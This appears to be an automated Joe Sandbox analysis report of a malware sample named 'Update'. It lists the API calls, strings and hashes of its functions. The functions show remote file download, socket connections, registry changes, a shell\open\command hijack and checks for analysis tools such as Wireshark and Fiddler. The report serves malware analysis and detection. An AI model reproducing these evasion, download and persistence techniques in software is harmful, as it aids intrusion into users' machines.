FlsSetValue, xrefs: 0380404D
FlsAlloc, xrefs: 03804038

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 8a827a49cca42d7ef8a199023e483387fec322698d93463c0e1f510e0db428d8
Instruction ID: 48f0c553341a6feeece6894ac843b9bd5400088d65a401c2288946e4bd5b3f77
Opcode Fuzzy Hash: 8a827a49cca42d7ef8a199023e483387fec322698d93463c0e1f510e0db428d8
Instruction Fuzzy Hash: B63188F5940B14AFDBA0FFB6ED08519BFA9EB6436070446DAE920E3294E7748041EF40

Function 10009AC6 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009ACE
__mtterm.LIBCMT ref: 10009ADA

Part of subcall function 100097A5: DecodePointer.KERNEL32(00000009,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 100097B6
Part of subcall function 100097A5: TlsFree.KERNEL32(0000001F,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 100097D0
Part of subcall function 100097A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 1000C031
Part of subcall function 100097A5: _free.LIBCMT ref: 1000C034
Part of subcall function 100097A5: DeleteCriticalSection.KERNEL32(0000001F,?,?,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 1000C05B

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10009AF0
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10009AFD
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10009B0A
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10009B17
TlsAlloc.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009B67
TlsSetValue.KERNEL32(00000000,?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009B82
__init_pointers.LIBCMT ref: 10009B8C
EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009B9D
EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BAA
EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BB7
EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BC4
DecodePointer.KERNEL32(Function_00009929,?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BE5
__calloc_crt.LIBCMT ref: 10009BFA
DecodePointer.KERNEL32(00000000,?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009C14
GetCurrentThreadId.KERNEL32 ref: 10009C26

Strings

FlsAlloc, xrefs: 10009AEA
KERNEL32.DLL, xrefs: 10009AC9
FlsGetValue, xrefs: 10009AF2
FlsSetValue, xrefs: 10009AFF
FlsFree, xrefs: 10009B0C

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: f6145c8d2fc98865c4004398df4a04ed430af6cefd03571db8e2710a2f51a93a
Instruction ID: 476fdbd6443a42851c863cb18b7173c2f7dcf4e8a02e7ba59ea7a710cfe5bbe7
Opcode Fuzzy Hash: f6145c8d2fc98865c4004398df4a04ed430af6cefd03571db8e2710a2f51a93a
Instruction Fuzzy Hash: 94313B35840A35EAF721DF758D88B1A3EE6EB493A1B14C526E414D72B4FB36D481CF50

Function 037FC3A0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 170stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 037FC3C2
_wcsrchr.LIBCMT ref: 037FC3CA
_memset.LIBCMT ref: 037FC401
_wcsrchr.LIBCMT ref: 037FC409
lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 037FC416
_memset.LIBCMT ref: 037FC484
wsprintfW.USER32 ref: 037FC49C
_memset.LIBCMT ref: 037FC4B0
_memset.LIBCMT ref: 037FC4CB
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000002), ref: 037FC501
lstrcatW.KERNEL32(?,0381535C), ref: 037FC549
lstrcatW.KERNEL32(?,?), ref: 037FC553
_memset.LIBCMT ref: 037FC56A

Strings

D, xrefs: 037FC576
%s\shell\open\command, xrefs: 037FC496
"%1, xrefs: 037FC50D
WinSta0\Default, xrefs: 037FC582

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
String ID: "%1$%s\shell\open\command$D$WinSta0\Default
API String ID: 3970221696-33419044
Opcode ID: 6db681fb808a24597d17d64811f62faf7112bd7359ebe2d5226212df3ac48f3e
Instruction ID: c047dd82519c740f7241667319a4bcf2fd3a3be0554f772a522b5a16afdd5adb
Opcode Fuzzy Hash: 6db681fb808a24597d17d64811f62faf7112bd7359ebe2d5226212df3ac48f3e
Instruction Fuzzy Hash: C351EAB5A8031D6ADB20E7A4CC45FEE737CEF54700F0045D4A709EA1C0EB749698CBA2

Function 037F7C80 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 141libraryloaderfileCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wininet.dll), ref: 037F7CC3
GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 037F7CD7
FreeLibrary.KERNEL32(00000000), ref: 037F7CF7
GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 037F7D16
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 037F7D53
_memset.LIBCMT ref: 037F7D7E
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 037F7D8C
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 037F7DDB
CloseHandle.KERNEL32(?), ref: 037F7DF9
Sleep.KERNEL32(00000001), ref: 037F7E01
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 037F7E0D
FreeLibrary.KERNEL32(00000000), ref: 037F7E28

Strings

InternetReadFile, xrefs: 037F7D86
InternetCloseHandle, xrefs: 037F7E07
InternetOpenW, xrefs: 037F7CD1
InternetOpenUrlW, xrefs: 037F7D10
MSIE 6.0, xrefs: 037F7CE1
wininet.dll, xrefs: 037F7CA6

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
API String ID: 1463273941-1099148085
Opcode ID: 5b83a842f19a77253a73f778efce19d901afa698687820c4a880c92cd8b0d705
Instruction ID: f8da893d61c0c8a870e23004bf74445f426ea8d5175e7cd6926094a3402748cb
Opcode Fuzzy Hash: 5b83a842f19a77253a73f778efce19d901afa698687820c4a880c92cd8b0d705
Instruction Fuzzy Hash: 92416E71A40228AFD724EB648C41FEEB3FCBF44700F14C5E9E658A6280DE745A458FE4

Function 037F4530 Relevance: 27.2, APIs: 18, Instructions: 247threadnetworksleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 037F455A
timeGetTime.WINMM ref: 037F457B
GetCurrentThreadId.KERNEL32 ref: 037F459B
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 037F45BD
SwitchToThread.KERNEL32 ref: 037F45D7
SetEvent.KERNEL32(?), ref: 037F4620
CloseHandle.KERNEL32(?), ref: 037F4644
send.WS2_32(?,038149C0,00000010,00000000), ref: 037F4668
SetEvent.KERNEL32(?), ref: 037F4686
InterlockedExchange.KERNEL32(?,00000000), ref: 037F4691
WSACloseEvent.WS2_32(?), ref: 037F469F
shutdown.WS2_32(?,00000001), ref: 037F46B3
closesocket.WS2_32(?), ref: 037F46BD
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 037F46F6
SetLastError.KERNEL32(000005B4), ref: 037F470A
GetCurrentThreadId.KERNEL32 ref: 037F472B
InterlockedExchange.KERNEL32(?,00000001), ref: 037F4743

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
String ID:
API String ID: 1692523546-0
Opcode ID: 28ec5ff3de399220ad1f102f7dc306c4750dfdb461ce41e41f5954f3beb6eb43
Instruction ID: 0fa6a98a45d831770627c059f716ac5e9e39546948fd982e590a596f0c7bdd53
Opcode Fuzzy Hash: 28ec5ff3de399220ad1f102f7dc306c4750dfdb461ce41e41f5954f3beb6eb43
Instruction Fuzzy Hash: 0F91CC74200A16EFC724EF26D888B6AF7A9FF44705F048569E6168B794C731F890CBD0

Function 037FA6F0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 254COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 037FA748
_memset.LIBCMT ref: 037FA788
_memset.LIBCMT ref: 037FA80E
swprintf.LIBCMT ref: 037FA82D

Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721

_memset.LIBCMT ref: 037FA905
swprintf.LIBCMT ref: 037FA924
_memset.LIBCMT ref: 037FA986
swprintf.LIBCMT ref: 037FA9A5

Strings

%s %s, xrefs: 037FA81C, 037FA890, 037FA913, 037FA994
onlyloadinmyself, xrefs: 037FA71C
plugmark, xrefs: 037FA75B

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: _memset$swprintf$_malloc
String ID: %s %s$onlyloadinmyself$plugmark
API String ID: 1873853019-591889663
Opcode ID: 0cf7a791aec0ed71ac5c25e84b8a2c5b5e40ddb50d4b7afb0089da892170300a
Instruction ID: cac0a013e79529a83d019c01412962c842ca0c3cff1186e6ad160580b7239388
Opcode Fuzzy Hash: 0cf7a791aec0ed71ac5c25e84b8a2c5b5e40ddb50d4b7afb0089da892170300a
Instruction Fuzzy Hash: 3881C7B5A40300AFE710EB54DC86F6B7764BF45710F1941A4EE199F382EB71E921C6A2

Function 037F5CC0 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 164windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 037F5CD3

Strings

Capsa, xrefs: 037F5E37, 037F5E5B
ApateDNS, xrefs: 037F5D1D
CurrPorts, xrefs: 037F5D75
TaskExplorer, xrefs: 037F5D5F
Metascan, xrefs: 037F5DA1
Sniff, xrefs: 037F5E49
Wireshark, xrefs: 037F5DB7
Port, xrefs: 037F5D8B
Process, xrefs: 037F5E6D
TCPEye, xrefs: 037F5D49
Malwarebytes, xrefs: 037F5D33
Fiddler, xrefs: 037F5E0F

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: VisibleWindow
String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
API String ID: 1208467747-3439171801
Opcode ID: b84817e9e061a8df5d8dd25dfa022a8c97ac39ee6833be2189a097bbef8ade61
Instruction ID: 48382da2fd85371e3114d6e246b55c75aaefe2075eba16591c91ece8b8799bfb
Opcode Fuzzy Hash: b84817e9e061a8df5d8dd25dfa022a8c97ac39ee6833be2189a097bbef8ade61
Instruction Fuzzy Hash: 564180E7E417112EDAA1E5B5DE02F9F624C1E639AAB0800E5ED18EC305F74DD22540EF

Function 10004530 Relevance: 24.2, APIs: 16, Instructions: 180threadnetworksleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 1000455A
timeGetTime.WINMM ref: 1000457B
GetCurrentThreadId.KERNEL32 ref: 1000459B
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 100045BD
SwitchToThread.KERNEL32 ref: 100045D7
SetEvent.KERNEL32(?), ref: 10004620
CloseHandle.KERNEL32(?), ref: 10004644
send.WS2_32(?,10017440,00000010,00000000), ref: 10004668
SetEvent.KERNEL32(?), ref: 10004686
InterlockedExchange.KERNEL32(?,00000000), ref: 10004691
WSACloseEvent.WS2_32(?), ref: 1000469F
shutdown.WS2_32(?,00000001), ref: 100046B3
closesocket.WS2_32(?), ref: 100046BD
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 100046F6
SetLastError.KERNEL32(000005B4), ref: 1000470A
GetCurrentThreadId.KERNEL32 ref: 1001FA44

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
String ID:
API String ID: 3448239111-0
Opcode ID: 8d79b15aa9448fa8a40132b16a0a16f3e48fc421b71208ac07a5b091827d0d03
Instruction ID: f154daa7adb366bc59dc3c87c5a832f84626f43c2ad915a7de221fbbd04ec74e
Opcode Fuzzy Hash: 8d79b15aa9448fa8a40132b16a0a16f3e48fc421b71208ac07a5b091827d0d03
Instruction Fuzzy Hash: CC51F4B4600A22EFE311DF60CCC8B99B7A5FF09782F114115E5058B694DB72F8A0CBD5

Function 037FDA30 Relevance: 21.3, APIs: 14, Instructions: 254COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,037FA8C1,?,?), ref: 037FDA43
SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,037FA8C1,?,?), ref: 037FDA62

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 8e0226cc3b64850034cb695274435c8558f4e7c2b82e8a26449cefac7f970f0c
Instruction ID: b600c171300ec9920d252c81975bbc9ceba14df7140f2cce72b147c96419e29b
Opcode Fuzzy Hash: 8e0226cc3b64850034cb695274435c8558f4e7c2b82e8a26449cefac7f970f0c
Instruction Fuzzy Hash: 9C81BF727006059FD730EFA9D884B6AF7E8FB48325F0446A9EA09CB744E771E940CB95

Function 037FC5E0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 037FC63D
_memset.LIBCMT ref: 037FC64C
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 037FC66F

Part of subcall function 037FC81E: RegCloseKey.ADVAPI32(80000000,037FC7FA), ref: 037FC82B
Part of subcall function 037FC81E: RegCloseKey.ADVAPI32(00000000), ref: 037FC834

Strings

%08X, xrefs: 037FC7D5

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Close_memset$Open
String ID: %08X
API String ID: 4292648718-3773563069
Opcode ID: aed0214dd0d1fe8ccd0d08fc4f17586fbc627dac8d3a85164102db010a01db50
Instruction ID: 9c87dde7f19eb0200b002dc3893fd7b8e535435ad0fc36cac2628ba7cf4bbdc7
Opcode Fuzzy Hash: aed0214dd0d1fe8ccd0d08fc4f17586fbc627dac8d3a85164102db010a01db50
Instruction Fuzzy Hash: 4B514DB2A40219AFDB25EF90CC85FEAB77CFB44704F404699E705AA180D774AB44CBA5

Function 037F36F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 037F3710
WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 037F3749
setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 037F3766
setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 037F3779
WSACreateEvent.WS2_32 ref: 037F377B
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,03821F0C), ref: 037F378D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,03821F0C), ref: 037F3799
lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,03821F0C), ref: 037F37B8
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03821F0C), ref: 037F37C4
gethostbyname.WS2_32(00000000), ref: 037F37D2
htons.WS2_32(?), ref: 037F37F8
WSAEventSelect.WS2_32(?,?,00000030), ref: 037F3816
connect.WS2_32(?,?,00000010), ref: 037F382B
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,03821F0C), ref: 037F383A

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
String ID:
API String ID: 1455939504-0
Opcode ID: 843198b3bb54a00658f81bd368125f4eaff90ea8fc6dddefabdeb00aa4f5f628
Instruction ID: d552a2b1c58db4133a2819964e3901884cb2c43b9dfa4e8f6d7f261bcb7c2b31
Opcode Fuzzy Hash: 843198b3bb54a00658f81bd368125f4eaff90ea8fc6dddefabdeb00aa4f5f628
Instruction Fuzzy Hash: 03415EB5A40205AFE724EBA4DC89F7EB7BCFB88710F104659F7259A2D0C674A904DB60

Function 100036F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 10003710
WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 10003749
setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 10003766
setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 10003779
WSACreateEvent.WS2_32 ref: 1000377B
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,1001D990), ref: 1000378D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,1001D990), ref: 10003799
lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,1001D990), ref: 100037B8
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,1001D990), ref: 100037C4
gethostbyname.WS2_32(00000000), ref: 100037D2
htons.WS2_32(?), ref: 100037F8
WSAEventSelect.WS2_32(?,?,00000030), ref: 10003816
connect.WS2_32(?,?,00000010), ref: 1000382B
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,1001D990), ref: 1000383A

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
String ID:
API String ID: 1455939504-0
Opcode ID: 717cd69355dde577bb5fef79b8aa358efc8542f3cb33ac356917f685119aa9e6
Instruction ID: 3f7f27d39b3a29da93cc6ce51bc3e722b1ee51b6efc1866e7789f3871d2ad327
Opcode Fuzzy Hash: 717cd69355dde577bb5fef79b8aa358efc8542f3cb33ac356917f685119aa9e6
Instruction Fuzzy Hash: E74160B1A40205ABE711DBA4CC89F6FB7B8EB48711F108619FA159B2D0DA71A904CB60

Function 037FAA10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 190sleeptimeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,4EB10097), ref: 037FAA58
wsprintfW.USER32 ref: 037FAA8F
_memset.LIBCMT ref: 037FAAA7
_memset.LIBCMT ref: 037FAABA

Part of subcall function 037F8020: lstrlenW.KERNEL32(?), ref: 037F8038
Part of subcall function 037F8020: _memset.LIBCMT ref: 037F8042
Part of subcall function 037F8020: lstrlenW.KERNEL32(?), ref: 037F804B
Part of subcall function 037F8020: lstrlenW.KERNEL32(?), ref: 037F8056

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 037FABBE
Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 037FAC6E
CloseHandle.KERNEL32(?), ref: 037FACAA

Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721

Part of subcall function 037F9730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,4EB10097,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E,00000000), ref: 037F9773
Part of subcall function 037F9730: InitializeCriticalSectionAndSpinCount.KERNEL32(037FE1AE,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F9812
Part of subcall function 037F9730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F9850

Strings

o1:, xrefs: 037FAAE2
p1:, xrefs: 037FAACE
t1:, xrefs: 037FAAF3
%4d.%2d.%2d-%2d:%2d:%2d, xrefs: 037FAA89

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
API String ID: 1254190970-1225219777
Opcode ID: ab28ec07a29ef1fe56802bda951bad80ab03716b0eabf9ab31184594f43e54f1
Instruction ID: 4b6eefeccfc536c1535fe96b964e0663a0d6a56b1d08f7cffc8dddd83c548a5a
Opcode Fuzzy Hash: ab28ec07a29ef1fe56802bda951bad80ab03716b0eabf9ab31184594f43e54f1
Instruction Fuzzy Hash: CB6171B1504340AFD7A0DF68D884EABB7EDBF89714F004A1DF69987280E7349544CBA7

Function 037FC860 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 037FC889
RegDeleteValueW.ADVAPI32(?), ref: 037FC894
RegCloseKey.ADVAPI32(?), ref: 037FC8A4
RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 037FC8C3
lstrlenW.KERNEL32(?), ref: 037FC8D1
RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 037FC8E4
RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 037FC8F2
RegCloseKey.ADVAPI32(?), ref: 037FC900

Strings

Network, xrefs: 037FC876, 037FC8B4
AppEvents, xrefs: 037FC86F, 037FC883, 037FC8AD, 037FC8BD

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Close$Value$CreateDeleteOpenlstrlen
String ID: AppEvents$Network
API String ID: 3935456190-3733486940
Opcode ID: a835e405f1327ad6c85ca970bcfaed87ab8352653cffc09fb001d23653f5f82f
Instruction ID: a317324be8216ca769bd3f480fb59c6adc500111522ee33299b0cb1f5f255ac2
Opcode Fuzzy Hash: a835e405f1327ad6c85ca970bcfaed87ab8352653cffc09fb001d23653f5f82f
Instruction Fuzzy Hash: 05114CB5A00208FFE725DAA5EC89FABB36CEB49750F104589FB05E7240D671EE10D7A4

Function 10005A20 Relevance: 16.7, APIs: 11, Instructions: 227timeCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,4B556414), ref: 10005A65
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 10005B04
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005B42
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005B67
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 10005C5F
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 10005C80
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005B8C

Part of subcall function 10001280: __CxxThrowException@8.LIBCMT ref: 10001290
Part of subcall function 10001280: DeleteCriticalSection.KERNEL32(00000000,?,10017E78), ref: 100012A1

InterlockedExchange.KERNEL32(?,00000000), ref: 10005CF1
timeGetTime.WINMM ref: 10005CF7
